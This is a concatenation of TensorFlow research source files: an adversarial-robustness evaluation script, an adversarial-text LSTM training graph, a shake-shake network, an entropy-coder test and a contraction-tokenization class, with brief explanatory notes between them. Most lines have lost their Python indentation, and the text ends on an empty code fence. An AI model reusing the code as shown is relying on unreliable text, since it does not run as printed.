flags.DEFINE_float('moving_average_decay', 0.9999,
'The decay to use for the moving average.')
flags.DEFINE_integer('eval_interval_secs', 120,
'The frequency, in seconds, with which evaluation is run.')
flags.DEFINE_integer(
'num_examples', -1,
'If positive - maximum number of example to use for evaluation.')
flags.DEFINE_bool('eval_once', False,
'If true then evaluate model only once.')
flags.DEFINE_string('trainable_scopes', None,
'If set then it defines list of variable scopes for '
'trainable variables.')
def main(_):
if not FLAGS.train_dir and not FLAGS.checkpoint_path:
    print('Either --train_dir or --checkpoint_path has to be provided.')
if FLAGS.train_dir and FLAGS.checkpoint_path:
print('Only one of --train_dir or --checkpoint_path should be provided.')
params = model_lib.default_hparams()
params.parse(FLAGS.hparams)
tf.logging.info('User provided hparams: %s', FLAGS.hparams)
tf.logging.info('All hyper parameters: %s', params)
batch_size = params.eval_batch_size
graph = tf.Graph()
with graph.as_default():
# dataset
dataset, num_examples, num_classes, bounds = dataset_factory.get_dataset(
FLAGS.dataset,
FLAGS.split_name,
batch_size,
FLAGS.dataset_image_size,
is_training=False)
dataset_iterator = dataset.make_one_shot_iterator()
images, labels = dataset_iterator.get_next()
if FLAGS.num_examples > 0:
num_examples = min(num_examples, FLAGS.num_examples)
# setup model
global_step = tf.train.get_or_create_global_step()
model_fn_two_args = model_lib.get_model(FLAGS.model_name, num_classes)
model_fn = lambda x: model_fn_two_args(x, is_training=False)
if not FLAGS.adv_method or FLAGS.adv_method == 'clean':
logits = model_fn(images)
else:
adv_examples = adversarial_attack.generate_adversarial_examples(
images, bounds, model_fn, FLAGS.adv_method)
logits = model_fn(adv_examples)
# update trainable variables if fine tuning is used
model_lib.filter_trainable_variables(FLAGS.trainable_scopes)
# Setup the moving averages
if FLAGS.moving_average_decay and (FLAGS.moving_average_decay > 0):
variable_averages = tf.train.ExponentialMovingAverage(
FLAGS.moving_average_decay, global_step)
variables_to_restore = variable_averages.variables_to_restore(
tf.contrib.framework.get_model_variables())
variables_to_restore[global_step.op.name] = global_step
else:
variables_to_restore = tf.contrib.framework.get_variables_to_restore()
# Setup evaluation metric
with tf.name_scope('Eval'):
names_to_values, names_to_updates = (
tf.contrib.metrics.aggregate_metric_map({
'Accuracy': tf.metrics.accuracy(labels, tf.argmax(logits, 1)),
'Top5': tf.metrics.recall_at_k(tf.to_int64(labels), logits, 5)
}))
      for name, value in names_to_values.items():
tf.summary.scalar(name, value)
# Run evaluation
num_batches = int(num_examples / batch_size)
if FLAGS.train_dir:
output_dir = os.path.join(FLAGS.train_dir, FLAGS.eval_name)
if not tf.gfile.Exists(output_dir):
tf.gfile.MakeDirs(output_dir)
tf.contrib.training.evaluate_repeatedly(
FLAGS.train_dir,
master=FLAGS.master,
scaffold=tf.train.Scaffold(
saver=tf.train.Saver(variables_to_restore)),
eval_ops=names_to_updates.values(),
eval_interval_secs=FLAGS.eval_interval_secs,
hooks=[
tf.contrib.training.StopAfterNEvalsHook(num_batches),
tf.contrib.training.SummaryAtEndHook(output_dir),
tf.train.LoggingTensorHook(names_to_values, at_end=True),
],
max_number_of_evaluations=1 if FLAGS.eval_once else None)
else:
result = tf.contrib.training.evaluate_once(
FLAGS.checkpoint_path,
master=FLAGS.master,
scaffold=tf.train.Scaffold(
saver=tf.train.Saver(variables_to_restore)),
eval_ops=names_to_updates.values(),
final_ops=names_to_values,
hooks=[
tf.contrib.training.StopAfterNEvalsHook(num_batches),
tf.train.LoggingTensorHook(names_to_values, at_end=True),
])
if FLAGS.output_file:
with tf.gfile.Open(FLAGS.output_file, 'a') as f:
f.write('%s,%.3f,%.3f\n'
% (FLAGS.eval_name, result['Accuracy'], result['Top5']))
if __name__ == '__main__':
app.run(main)
```
#### File: research/adversarial_text/graphs.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import os
# Dependency imports
import tensorflow as tf
import adversarial_losses as adv_lib
import inputs as inputs_lib
import layers as layers_lib
flags = tf.app.flags
FLAGS = flags.FLAGS
# Flags governing adversarial training are defined in adversarial_losses.py.
# Classifier
flags.DEFINE_integer('num_classes', 2, 'Number of classes for classification')
# Data path
flags.DEFINE_string('data_dir', '/tmp/IMDB',
'Directory path to preprocessed text dataset.')
flags.DEFINE_string('vocab_freq_path', None,
'Path to pre-calculated vocab frequency data. If '
'None, use FLAGS.data_dir/vocab_freq.txt.')
flags.DEFINE_integer('batch_size', 64, 'Size of the batch.')
flags.DEFINE_integer('num_timesteps', 100, 'Number of timesteps for BPTT')
# Model architecture
flags.DEFINE_bool('bidir_lstm', False, 'Whether to build a bidirectional LSTM.')
flags.DEFINE_bool('single_label', True, 'Whether the sequence has a single '
'label, for optimization.')
flags.DEFINE_integer('rnn_num_layers', 1, 'Number of LSTM layers.')
flags.DEFINE_integer('rnn_cell_size', 512,
'Number of hidden units in the LSTM.')
flags.DEFINE_integer('cl_num_layers', 1,
'Number of hidden layers of classification model.')
flags.DEFINE_integer('cl_hidden_size', 30,
'Number of hidden units in classification layer.')
flags.DEFINE_integer('num_candidate_samples', -1,
'Num samples used in the sampled output layer.')
flags.DEFINE_bool('use_seq2seq_autoencoder', False,
'If True, seq2seq auto-encoder is used to pretrain. '
'If False, standard language model is used.')
# Vocabulary and embeddings
flags.DEFINE_integer('embedding_dims', 256, 'Dimensions of embedded vector.')
flags.DEFINE_integer('vocab_size', 86934,
                     'The size of the vocabulary. This value should be '
                     'exactly the same as the number of vocabulary entries '
                     'used in the dataset, because the last indexed entry '
                     'of the preprocessed dataset is always <eos> and here '
                     'we specify <eos> with that index.')
flags.DEFINE_bool('normalize_embeddings', True,
'Normalize word embeddings by vocab frequency')
# Optimization
flags.DEFINE_float('learning_rate', 0.001, 'Learning rate while fine-tuning.')
flags.DEFINE_float('learning_rate_decay_factor', 1.0,
'Learning rate decay factor')
flags.DEFINE_boolean('sync_replicas', False, 'sync_replica or not')
flags.DEFINE_integer('replicas_to_aggregate', 1,
'The number of replicas to aggregate')
# Regularization
flags.DEFINE_float('max_grad_norm', 1.0,
'Clip the global gradient norm to this value.')
flags.DEFINE_float('keep_prob_emb', 1.0, 'keep probability on embedding layer. '
'0.5 is optimal on IMDB with virtual adversarial training.')
flags.DEFINE_float('keep_prob_lstm_out', 1.0,
'keep probability on lstm output.')
flags.DEFINE_float('keep_prob_cl_hidden', 1.0,
'keep probability on classification hidden layer')
def get_model():
if FLAGS.bidir_lstm:
return VatxtBidirModel()
else:
return VatxtModel()
class VatxtModel(object):
"""Constructs training and evaluation graphs.
Main methods: `classifier_training()`, `language_model_training()`,
and `eval_graph()`.
Variable reuse is a critical part of the model, both for sharing variables
between the language model and the classifier, and for reusing variables for
the adversarial loss calculation. To ensure correct variable reuse, all
variables are created in Keras-style layers, wherein stateful layers (i.e.
layers with variables) are represented as callable instances of the Layer
class. Each time the Layer instance is called, it is using the same variables.
All Layers are constructed in the __init__ method and reused in the various
graph-building functions.
"""
def __init__(self, cl_logits_input_dim=None):
self.global_step = tf.train.get_or_create_global_step()
self.vocab_freqs = _get_vocab_freqs()
# Cache VatxtInput objects
self.cl_inputs = None
self.lm_inputs = None
# Cache intermediate Tensors that are reused
self.tensors = {}
# Construct layers which are reused in constructing the LM and
# Classification graphs. Instantiating them all once here ensures that
# variable reuse works correctly.
self.layers = {}
self.layers['embedding'] = layers_lib.Embedding(
FLAGS.vocab_size, FLAGS.embedding_dims, FLAGS.normalize_embeddings,
self.vocab_freqs, FLAGS.keep_prob_emb)
self.layers['lstm'] = layers_lib.LSTM(
FLAGS.rnn_cell_size, FLAGS.rnn_num_layers, FLAGS.keep_prob_lstm_out)
self.layers['lm_loss'] = layers_lib.SoftmaxLoss(
FLAGS.vocab_size,
FLAGS.num_candidate_samples,
self.vocab_freqs,
name='LM_loss')
cl_logits_input_dim = cl_logits_input_dim or FLAGS.rnn_cell_size
self.layers['cl_logits'] = layers_lib.cl_logits_subgraph(
[FLAGS.cl_hidden_size] * FLAGS.cl_num_layers, cl_logits_input_dim,
FLAGS.num_classes, FLAGS.keep_prob_cl_hidden)
@property
def pretrained_variables(self):
return (self.layers['embedding'].trainable_weights +
self.layers['lstm'].trainable_weights)
def classifier_training(self):
loss = self.classifier_graph()
train_op = optimize(loss, self.global_step)
return train_op, loss, self.global_step
def language_model_training(self):
loss = self.language_model_graph()
train_op = optimize(loss, self.global_step)
return train_op, loss, self.global_step
def classifier_graph(self):
"""Constructs classifier graph from inputs to classifier loss.
* Caches the VatxtInput object in `self.cl_inputs`
* Caches tensors: `cl_embedded`, `cl_logits`, `cl_loss`
Returns:
loss: scalar float.
"""
inputs = _inputs('train', pretrain=False)
self.cl_inputs = inputs
embedded = self.layers['embedding'](inputs.tokens)
self.tensors['cl_embedded'] = embedded
_, next_state, logits, loss = self.cl_loss_from_embedding(
embedded, return_intermediates=True)
tf.summary.scalar('classification_loss', loss)
self.tensors['cl_logits'] = logits
self.tensors['cl_loss'] = loss
if FLAGS.single_label:
indices = tf.stack([tf.range(FLAGS.batch_size), inputs.length - 1], 1)
labels = tf.expand_dims(tf.gather_nd(inputs.labels, indices), 1)
weights = tf.expand_dims(tf.gather_nd(inputs.weights, indices), 1)
else:
labels = inputs.labels
weights = inputs.weights
acc = layers_lib.accuracy(logits, labels, weights)
tf.summary.scalar('accuracy', acc)
adv_loss = (self.adversarial_loss() * tf.constant(
FLAGS.adv_reg_coeff, name='adv_reg_coeff'))
tf.summary.scalar('adversarial_loss', adv_loss)
total_loss = loss + adv_loss
with tf.control_dependencies([inputs.save_state(next_state)]):
total_loss = tf.identity(total_loss)
tf.summary.scalar('total_classification_loss', total_loss)
return total_loss
def language_model_graph(self, compute_loss=True):
"""Constructs LM graph from inputs to LM loss.
* Caches the VatxtInput object in `self.lm_inputs`
* Caches tensors: `lm_embedded`
Args:
compute_loss: bool, whether to compute and return the loss or stop after
the LSTM computation.
Returns:
loss: scalar float.
"""
inputs = _inputs('train', pretrain=True)
self.lm_inputs = inputs
return self._lm_loss(inputs, compute_loss=compute_loss)
def _lm_loss(self,
inputs,
emb_key='lm_embedded',
lstm_layer='lstm',
lm_loss_layer='lm_loss',
loss_name='lm_loss',
compute_loss=True):
embedded = self.layers['embedding'](inputs.tokens)
self.tensors[emb_key] = embedded
lstm_out, next_state = self.layers[lstm_layer](embedded, inputs.state,
inputs.length)
if compute_loss:
loss = self.layers[lm_loss_layer](
[lstm_out, inputs.labels, inputs.weights])
with tf.control_dependencies([inputs.save_state(next_state)]):
loss = tf.identity(loss)
tf.summary.scalar(loss_name, loss)
return loss
def eval_graph(self, dataset='test'):
"""Constructs classifier evaluation graph.
Args:
dataset: the labeled dataset to evaluate, {'train', 'test', 'valid'}.
Returns:
eval_ops: dict<metric name, tuple(value, update_op)>
var_restore_dict: dict mapping variable restoration names to variables.
Trainable variables will be mapped to their moving average names.
"""
inputs = _inputs(dataset, pretrain=False)
embedded = self.layers['embedding'](inputs.tokens)
_, next_state, logits, _ = self.cl_loss_from_embedding(
embedded, inputs=inputs, return_intermediates=True)
if FLAGS.single_label:
indices = tf.stack([tf.range(FLAGS.batch_size), inputs.length - 1], 1)
labels = tf.expand_dims(tf.gather_nd(inputs.labels, indices), 1)
weights = tf.expand_dims(tf.gather_nd(inputs.weights, indices), 1)
else:
labels = inputs.labels
weights = inputs.weights
eval_ops = {
'accuracy':
tf.contrib.metrics.streaming_accuracy(
layers_lib.predictions(logits), labels, weights)
}
with tf.control_dependencies([inputs.save_state(next_state)]):
acc, acc_update = eval_ops['accuracy']
acc_update = tf.identity(acc_update)
eval_ops['accuracy'] = (acc, acc_update)
var_restore_dict = make_restore_average_vars_dict()
return eval_ops, var_restore_dict
def cl_loss_from_embedding(self,
embedded,
inputs=None,
return_intermediates=False):
"""Compute classification loss from embedding.
Args:
embedded: 3-D float Tensor [batch_size, num_timesteps, embedding_dim]
inputs: VatxtInput, defaults to self.cl_inputs.
return_intermediates: bool, whether to return intermediate tensors or only
the final loss.
Returns:
If return_intermediates is True:
lstm_out, next_state, logits, loss
Else:
loss
"""
if inputs is None:
inputs = self.cl_inputs
lstm_out, next_state = self.layers['lstm'](embedded, inputs.state,
inputs.length)
if FLAGS.single_label:
indices = tf.stack([tf.range(FLAGS.batch_size), inputs.length - 1], 1)
lstm_out = tf.expand_dims(tf.gather_nd(lstm_out, indices), 1)
labels = tf.expand_dims(tf.gather_nd(inputs.labels, indices), 1)
weights = tf.expand_dims(tf.gather_nd(inputs.weights, indices), 1)
else:
labels = inputs.labels
weights = inputs.weights
logits = self.layers['cl_logits'](lstm_out)
loss = layers_lib.classification_loss(logits, labels, weights)
if return_intermediates:
return lstm_out, next_state, logits, loss
else:
return loss
def adversarial_loss(self):
"""Compute adversarial loss based on FLAGS.adv_training_method."""
def random_perturbation_loss():
return adv_lib.random_perturbation_loss(self.tensors['cl_embedded'],
self.cl_inputs.length,
self.cl_loss_from_embedding)
def adversarial_loss():
return adv_lib.adversarial_loss(self.tensors['cl_embedded'],
self.tensors['cl_loss'],
self.cl_loss_from_embedding)
def virtual_adversarial_loss():
"""Computes virtual adversarial loss.
Uses lm_inputs and constructs the language model graph if it hasn't yet
been constructed.
Also ensures that the LM input states are saved for LSTM state-saving
BPTT.
Returns:
loss: float scalar.
"""
if self.lm_inputs is None:
self.language_model_graph(compute_loss=False)
def logits_from_embedding(embedded, return_next_state=False):
_, next_state, logits, _ = self.cl_loss_from_embedding(
embedded, inputs=self.lm_inputs, return_intermediates=True)
if return_next_state:
return next_state, logits
else:
return logits
next_state, lm_cl_logits = logits_from_embedding(
self.tensors['lm_embedded'], return_next_state=True)
va_loss = adv_lib.virtual_adversarial_loss(
lm_cl_logits, self.tensors['lm_embedded'], self.lm_inputs,
logits_from_embedding)
with tf.control_dependencies([self.lm_inputs.save_state(next_state)]):
va_loss = tf.identity(va_loss)
return va_loss
def combo_loss():
return adversarial_loss() + virtual_adversarial_loss()
adv_training_methods = {
# Random perturbation
'rp': random_perturbation_loss,
# Adversarial training
'at': adversarial_loss,
# Virtual adversarial training
'vat': virtual_adversarial_loss,
# Both at and vat
'atvat': combo_loss,
'': lambda: tf.constant(0.),
None: lambda: tf.constant(0.),
}
with tf.name_scope('adversarial_loss'):
return adv_training_methods[FLAGS.adv_training_method]()
class VatxtBidirModel(VatxtModel):
"""Extension of VatxtModel that supports bidirectional input."""
def __init__(self):
super(VatxtBidirModel,
self).__init__(cl_logits_input_dim=FLAGS.rnn_cell_size * 2)
# Reverse LSTM and LM loss for bidirectional models
self.layers['lstm_reverse'] = layers_lib.LSTM(
FLAGS.rnn_cell_size,
FLAGS.rnn_num_layers,
FLAGS.keep_prob_lstm_out,
name='LSTM_Reverse')
self.layers['lm_loss_reverse'] = layers_lib.SoftmaxLoss(
FLAGS.vocab_size,
FLAGS.num_candidate_samples,
self.vocab_freqs,
name='LM_loss_reverse')
@property
def pretrained_variables(self):
variables = super(VatxtBidirModel, self).pretrained_variables
variables.extend(self.layers['lstm_reverse'].trainable_weights)
return variables
def classifier_graph(self):
"""Constructs classifier graph from inputs to classifier loss.
* Caches the VatxtInput objects in `self.cl_inputs`
* Caches tensors: `cl_embedded` (tuple of forward and reverse), `cl_logits`,
`cl_loss`
Returns:
loss: scalar float.
"""
inputs = _inputs('train', pretrain=False, bidir=True)
self.cl_inputs = inputs
f_inputs, _ = inputs
# Embed both forward and reverse with a shared embedding
embedded = [self.layers['embedding'](inp.tokens) for inp in inputs]
self.tensors['cl_embedded'] = embedded
_, next_states, logits, loss = self.cl_loss_from_embedding(
embedded, return_intermediates=True)
tf.summary.scalar('classification_loss', loss)
self.tensors['cl_logits'] = logits
self.tensors['cl_loss'] = loss
acc = layers_lib.accuracy(logits, f_inputs.labels, f_inputs.weights)
tf.summary.scalar('accuracy', acc)
adv_loss = (self.adversarial_loss() * tf.constant(
FLAGS.adv_reg_coeff, name='adv_reg_coeff'))
tf.summary.scalar('adversarial_loss', adv_loss)
total_loss = loss + adv_loss
saves = [inp.save_state(state) for (inp, state) in zip(inputs, next_states)]
with tf.control_dependencies(saves):
total_loss = tf.identity(total_loss)
tf.summary.scalar('total_classification_loss', total_loss)
return total_loss
def language_model_graph(self, compute_loss=True):
"""Constructs forward and reverse LM graphs from inputs to LM losses.
* Caches the VatxtInput objects in `self.lm_inputs`
* Caches tensors: `lm_embedded`, `lm_embedded_reverse`
Args:
compute_loss: bool, whether to compute and return the loss or stop after
the LSTM computation.
Returns:
loss: scalar float, sum of forward and reverse losses.
"""
inputs = _inputs('train', pretrain=True, bidir=True)
self.lm_inputs = inputs
f_inputs, r_inputs = inputs
f_loss = self._lm_loss(f_inputs, compute_loss=compute_loss)
r_loss = self._lm_loss(
r_inputs,
emb_key='lm_embedded_reverse',
lstm_layer='lstm_reverse',
lm_loss_layer='lm_loss_reverse',
loss_name='lm_loss_reverse',
compute_loss=compute_loss)
if compute_loss:
return f_loss + r_loss
def eval_graph(self, dataset='test'):
"""Constructs classifier evaluation graph.
Args:
dataset: the labeled dataset to evaluate, {'train', 'test', 'valid'}.
Returns:
eval_ops: dict<metric name, tuple(value, update_op)>
var_restore_dict: dict mapping variable restoration names to variables.
Trainable variables will be mapped to their moving average names.
"""
inputs = _inputs(dataset, pretrain=False, bidir=True)
embedded = [self.layers['embedding'](inp.tokens) for inp in inputs]
_, next_states, logits, _ = self.cl_loss_from_embedding(
embedded, inputs=inputs, return_intermediates=True)
f_inputs, _ = inputs
eval_ops = {
'accuracy':
tf.contrib.metrics.streaming_accuracy(
layers_lib.predictions(logits), f_inputs.labels,
f_inputs.weights)
}
# Save states on accuracy update
saves = [inp.save_state(state) for (inp, state) in zip(inputs, next_states)]
with tf.control_dependencies(saves):
acc, acc_update = eval_ops['accuracy']
acc_update = tf.identity(acc_update)
eval_ops['accuracy'] = (acc, acc_update)
var_restore_dict = make_restore_average_vars_dict()
return eval_ops, var_restore_dict
def cl_loss_from_embedding(self,
embedded,
inputs=None,
return_intermediates=False):
"""Compute classification loss from embedding.
Args:
embedded: Length 2 tuple of 3-D float Tensor
[batch_size, num_timesteps, embedding_dim].
inputs: Length 2 tuple of VatxtInput, defaults to self.cl_inputs.
return_intermediates: bool, whether to return intermediate tensors or only
the final loss.
Returns:
If return_intermediates is True:
lstm_out, next_states, logits, loss
Else:
loss
"""
if inputs is None:
inputs = self.cl_inputs
out = []
for (layer_name, emb, inp) in zip(['lstm', 'lstm_reverse'], embedded,
inputs):
out.append(self.layers[layer_name](emb, inp.state, inp.length))
lstm_outs, next_states = zip(*out)
# Concatenate output of forward and reverse LSTMs
lstm_out = tf.concat(lstm_outs, 1)
logits = self.layers['cl_logits'](lstm_out)
f_inputs, _ = inputs # pylint: disable=unpacking-non-sequence
loss = layers_lib.classification_loss(logits, f_inputs.labels,
f_inputs.weights)
if return_intermediates:
return lstm_out, next_states, logits, loss
else:
return loss
def adversarial_loss(self):
"""Compute adversarial loss based on FLAGS.adv_training_method."""
def random_perturbation_loss():
return adv_lib.random_perturbation_loss_bidir(self.tensors['cl_embedded'],
self.cl_inputs[0].length,
self.cl_loss_from_embedding)
def adversarial_loss():
return adv_lib.adversarial_loss_bidir(self.tensors['cl_embedded'],
self.tensors['cl_loss'],
self.cl_loss_from_embedding)
def virtual_adversarial_loss():
"""Computes virtual adversarial loss.
Uses lm_inputs and constructs the language model graph if it hasn't yet
been constructed.
Also ensures that the LM input states are saved for LSTM state-saving
BPTT.
Returns:
loss: float scalar.
"""
if self.lm_inputs is None:
self.language_model_graph(compute_loss=False)
def logits_from_embedding(embedded, return_next_state=False):
_, next_states, logits, _ = self.cl_loss_from_embedding(
embedded, inputs=self.lm_inputs, return_intermediates=True)
if return_next_state:
return next_states, logits
else:
return logits
lm_embedded = (self.tensors['lm_embedded'],
self.tensors['lm_embedded_reverse'])
next_states, lm_cl_logits = logits_from_embedding(
lm_embedded, return_next_state=True)
va_loss = adv_lib.virtual_adversarial_loss_bidir(
lm_cl_logits, lm_embedded, self.lm_inputs, logits_from_embedding)
saves = [
inp.save_state(state)
for (inp, state) in zip(self.lm_inputs, next_states)
]
with tf.control_dependencies(saves):
va_loss = tf.identity(va_loss)
return va_loss
def combo_loss():
return adversarial_loss() + virtual_adversarial_loss()
adv_training_methods = {
# Random perturbation
'rp': random_perturbation_loss,
# Adversarial training
'at': adversarial_loss,
# Virtual adversarial training
'vat': virtual_adversarial_loss,
# Both at and vat
'atvat': combo_loss,
'': lambda: tf.constant(0.),
None: lambda: tf.constant(0.),
}
with tf.name_scope('adversarial_loss'):
return adv_training_methods[FLAGS.adv_training_method]()
def _inputs(dataset='train', pretrain=False, bidir=False):
return inputs_lib.inputs(
data_dir=FLAGS.data_dir,
phase=dataset,
bidir=bidir,
pretrain=pretrain,
use_seq2seq=pretrain and FLAGS.use_seq2seq_autoencoder,
state_size=FLAGS.rnn_cell_size,
num_layers=FLAGS.rnn_num_layers,
batch_size=FLAGS.batch_size,
unroll_steps=FLAGS.num_timesteps,
eos_id=FLAGS.vocab_size - 1)
def _get_vocab_freqs():
"""Returns vocab frequencies.
Returns:
List of integers, length=FLAGS.vocab_size.
Raises:
ValueError: if the length of the frequency file is not equal to the vocab
size, or if the file is not found.
"""
path = FLAGS.vocab_freq_path or os.path.join(FLAGS.data_dir, 'vocab_freq.txt')
if tf.gfile.Exists(path):
with tf.gfile.Open(path) as f:
# Get pre-calculated frequencies of words.
reader = csv.reader(f, quoting=csv.QUOTE_NONE)
freqs = [int(row[-1]) for row in reader]
if len(freqs) != FLAGS.vocab_size:
raise ValueError('Frequency file length %d != vocab size %d' %
(len(freqs), FLAGS.vocab_size))
else:
if FLAGS.vocab_freq_path:
raise ValueError('vocab_freq_path not found')
freqs = [1] * FLAGS.vocab_size
return freqs
def make_restore_average_vars_dict():
"""Returns dict mapping moving average names to variables."""
var_restore_dict = {}
variable_averages = tf.train.ExponentialMovingAverage(0.999)
for v in tf.global_variables():
if v in tf.trainable_variables():
name = variable_averages.average_name(v)
else:
name = v.op.name
var_restore_dict[name] = v
return var_restore_dict
def optimize(loss, global_step):
return layers_lib.optimize(
loss, global_step, FLAGS.max_grad_norm, FLAGS.learning_rate,
FLAGS.learning_rate_decay_factor, FLAGS.sync_replicas,
FLAGS.replicas_to_aggregate, FLAGS.task)
```
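The VatxtModel docstring above leans on Keras-style layer objects for variable reuse: each layer is constructed once in `__init__` and every later call reuses the same variables. The toy sketch below demonstrates that property with a stock `tf.keras.layers.Dense` layer; it is independent of the adversarial-text code and assumes a TF version with `tf.keras` available.
```python
import tensorflow as tf
# Construct the layer once; every call below reuses the same kernel and bias.
shared_dense = tf.keras.layers.Dense(4, name='shared_logits')
x_a = tf.keras.Input(shape=(8,))
x_b = tf.keras.Input(shape=(8,))
logits_a = shared_dense(x_a)  # creates the variables
logits_b = shared_dense(x_b)  # reuses the same variables
model = tf.keras.Model([x_a, x_b], [logits_a, logits_b])
print(len(model.trainable_weights))  # 2: one shared kernel and one shared bias
```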
#### File: research/autoaugment/shake_shake.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import custom_ops as ops
import tensorflow as tf
def _shake_shake_skip_connection(x, output_filters, stride):
"""Adds a residual connection to the filter x for the shake-shake model."""
curr_filters = int(x.shape[3])
if curr_filters == output_filters:
return x
stride_spec = ops.stride_arr(stride, stride)
# Skip path 1
path1 = tf.nn.avg_pool(
x, [1, 1, 1, 1], stride_spec, 'VALID', data_format='NHWC')
path1 = ops.conv2d(path1, int(output_filters / 2), 1, scope='path1_conv')
# Skip path 2
# First pad with 0's then crop
pad_arr = [[0, 0], [0, 1], [0, 1], [0, 0]]
path2 = tf.pad(x, pad_arr)[:, 1:, 1:, :]
concat_axis = 3
path2 = tf.nn.avg_pool(
path2, [1, 1, 1, 1], stride_spec, 'VALID', data_format='NHWC')
path2 = ops.conv2d(path2, int(output_filters / 2), 1, scope='path2_conv')
# Concat and apply BN
final_path = tf.concat(values=[path1, path2], axis=concat_axis)
final_path = ops.batch_norm(final_path, scope='final_path_bn')
return final_path
def _shake_shake_branch(x, output_filters, stride, rand_forward, rand_backward,
is_training):
"""Building a 2 branching convnet."""
x = tf.nn.relu(x)
x = ops.conv2d(x, output_filters, 3, stride=stride, scope='conv1')
x = ops.batch_norm(x, scope='bn1')
x = tf.nn.relu(x)
x = ops.conv2d(x, output_filters, 3, scope='conv2')
x = ops.batch_norm(x, scope='bn2')
if is_training:
x = x * rand_backward + tf.stop_gradient(x * rand_forward -
x * rand_backward)
else:
x *= 1.0 / 2
return x
def _shake_shake_block(x, output_filters, stride, is_training):
"""Builds a full shake-shake sub layer."""
batch_size = tf.shape(x)[0]
# Generate random numbers for scaling the branches
rand_forward = [
tf.random_uniform(
[batch_size, 1, 1, 1], minval=0, maxval=1, dtype=tf.float32)
for _ in range(2)
]
rand_backward = [
tf.random_uniform(
[batch_size, 1, 1, 1], minval=0, maxval=1, dtype=tf.float32)
for _ in range(2)
]
# Normalize so that all sum to 1
total_forward = tf.add_n(rand_forward)
total_backward = tf.add_n(rand_backward)
rand_forward = [samp / total_forward for samp in rand_forward]
rand_backward = [samp / total_backward for samp in rand_backward]
zipped_rand = zip(rand_forward, rand_backward)
branches = []
for branch, (r_forward, r_backward) in enumerate(zipped_rand):
with tf.variable_scope('branch_{}'.format(branch)):
b = _shake_shake_branch(x, output_filters, stride, r_forward, r_backward,
is_training)
branches.append(b)
res = _shake_shake_skip_connection(x, output_filters, stride)
return res + tf.add_n(branches)
def _shake_shake_layer(x, output_filters, num_blocks, stride,
is_training):
"""Builds many sub layers into one full layer."""
for block_num in range(num_blocks):
curr_stride = stride if (block_num == 0) else 1
with tf.variable_scope('layer_{}'.format(block_num)):
x = _shake_shake_block(x, output_filters, curr_stride,
is_training)
return x
def build_shake_shake_model(images, num_classes, hparams, is_training):
"""Builds the Shake-Shake model.
Build the Shake-Shake model from https://arxiv.org/abs/1705.07485.
Args:
images: Tensor of images that will be fed into the Wide ResNet Model.
num_classes: Number of classed that the model needs to predict.
hparams: tf.HParams object that contains additional hparams needed to
construct the model. In this case it is the `shake_shake_widen_factor`
that is used to determine how many filters the model has.
is_training: Is the model training or not.
Returns:
The logits of the Shake-Shake model.
"""
depth = 26
k = hparams.shake_shake_widen_factor # The widen factor
n = int((depth - 2) / 6)
x = images
x = ops.conv2d(x, 16, 3, scope='init_conv')
x = ops.batch_norm(x, scope='init_bn')
with tf.variable_scope('L1'):
x = _shake_shake_layer(x, 16 * k, n, 1, is_training)
with tf.variable_scope('L2'):
x = _shake_shake_layer(x, 32 * k, n, 2, is_training)
with tf.variable_scope('L3'):
x = _shake_shake_layer(x, 64 * k, n, 2, is_training)
x = tf.nn.relu(x)
x = ops.global_avg_pool(x)
# Fully connected
logits = ops.fc(x, num_classes)
return logits
```
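The branch scaling in `_shake_shake_branch` uses the standard stop-gradient trick: the forward value is scaled by `rand_forward` while the gradient is scaled by `rand_backward`. The scalar check below verifies both facts with TF 2 eager execution; it is an illustration, not part of the AutoAugment code.
```python
import tensorflow as tf
x = tf.constant(3.0)
rand_forward = tf.constant(0.7)
rand_backward = tf.constant(0.2)
with tf.GradientTape() as tape:
    tape.watch(x)
    y = x * rand_backward + tf.stop_gradient(x * rand_forward - x * rand_backward)
print(float(y))                    # 2.1 == x * rand_forward (forward value)
print(float(tape.gradient(y, x)))  # 0.2 == rand_backward (gradient scale)
```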
#### File: entropy_coder/all_models/all_models_test.py
```python
import tensorflow as tf
# pylint: disable=unused-import
import all_models
# pylint: enable=unused-import
from entropy_coder.model import model_factory
class AllModelsTest(tf.test.TestCase):
def testBuildModelForTraining(self):
factory = model_factory.GetModelRegistry()
model_names = factory.GetAvailableModels()
for m in model_names:
tf.reset_default_graph()
global_step = tf.Variable(tf.zeros([], dtype=tf.int64),
trainable=False,
name='global_step')
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.1)
batch_size = 3
height = 40
width = 20
depth = 5
binary_codes = tf.placeholder(dtype=tf.float32,
shape=[batch_size, height, width, depth])
# Create a model with the default configuration.
print('Creating model: {}'.format(m))
model = factory.CreateModel(m)
model.Initialize(global_step,
optimizer,
model.GetConfigStringForUnitTest())
self.assertTrue(model.loss is None, 'model: {}'.format(m))
self.assertTrue(model.train_op is None, 'model: {}'.format(m))
self.assertTrue(model.average_code_length is None, 'model: {}'.format(m))
# Build the Tensorflow graph corresponding to the model.
model.BuildGraph(binary_codes)
self.assertTrue(model.loss is not None, 'model: {}'.format(m))
self.assertTrue(model.average_code_length is not None,
'model: {}'.format(m))
if model.train_op is None:
print('Model {} is not trainable'.format(m))
if __name__ == '__main__':
tf.test.main()
```
#### File: cvt_text/corpus_processing/example.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from base import embeddings
CONTRACTION_WORDS = set(w + 'n' for w in
['do', 'does', 'did', 'is', 'are', 'was', 'were', 'has',
'have', 'had', 'could', 'would', 'should', 'ca', 'wo',
'ai', 'might'])
class Example(object):
def __init__(self, words, word_vocab, char_vocab):
words = words[:]
# Fix inconsistent tokenization between datasets
for i in range(len(words)):
if (words[i].lower() == '\'t' and i > 0 and
words[i - 1].lower() in CONTRACTION_WORDS):
words[i] = words[i - 1][-1] + words[i]
words[i - 1] = words[i - 1][:-1]
self.words = ([embeddings.START] +
[word_vocab[embeddings.normalize_word(w)] for w in words] +
[embeddings.END])
self.chars = ([[embeddings.MISSING]] +
[[char_vocab[c] for c in embeddings.normalize_chars(w)]
for w in words] +
[[embeddings.MISSING]])
def __repr__(self,):
inv_char_vocab = embeddings.get_inv_char_vocab()
return ' '.join([''.join([inv_char_vocab[c] for c in w])
for w in self.chars])
```
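The loop in `Example.__init__` re-tokenizes contractions so that, for example, ["don", "'t"] becomes ["do", "n't"]. The standalone sketch below replays just that loop on plain strings, leaving out the vocabulary lookups of the original class.
```python
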